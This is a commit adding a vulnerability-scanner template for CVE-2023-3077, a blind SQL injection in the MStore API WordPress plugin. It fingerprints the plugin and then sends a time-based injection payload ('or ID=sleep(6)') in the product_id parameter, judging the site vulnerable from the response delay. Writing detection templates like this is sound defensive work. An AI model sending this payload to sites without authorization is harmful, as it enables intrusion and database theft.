Create CVE-2023-3077.yaml

http/cves/2023/CVE-2023-3077.yaml

@@ -0,0 +1,53 @@
+id: CVE-2023-3077
+
+info:
+  name: MStore API < 3.9.8 - Unauthenticated Blind SQL Injection
+  author: DhiyaneshDK
+  severity: critical
+  description: |
+    The MStore API WordPress plugin before 3.9.8 is vulnerable to Blind SQL injection via the product_id parameter.
+  impact: |
+    Allows an attacker to extract sensitive data from the database
+  remediation: |
+    Update MStore API WordPress Plugin to the latest version to mitigate the vulnerability
+  reference:
+    - https://wpscan.com/vulnerability/9480d0b5-97da-467d-98f6-71a32599a432
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-3077
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-3077
+    epss-score: 0.00148
+    epss-percentile: 0.50816
+    cpe: cpe:2.3:a:inspireui:mstore_api:*:*:*:*:*:wordpress:*:*
+  metadata:
+    verified: treu
+    vendor: inspireui
+    product: mstore_api
+    framework: wordpress
+    publicwww-query: "/wp-content/plugins/mstore-api/"
+  tags: cve,cve2023,wpscan,wordpress,wp-plugin,wp,mstore-api
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/mstore-api/readme.txt"
+
+    matchers:
+      - type: dsl
+        internal: true
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "MStore API")'
+        condition: and
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-json/api/flutter_booking/get_staffs?product_id=%27+or+ID=sleep(6)--+-"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=6'
+          - 'status_code == 200'
+        condition: and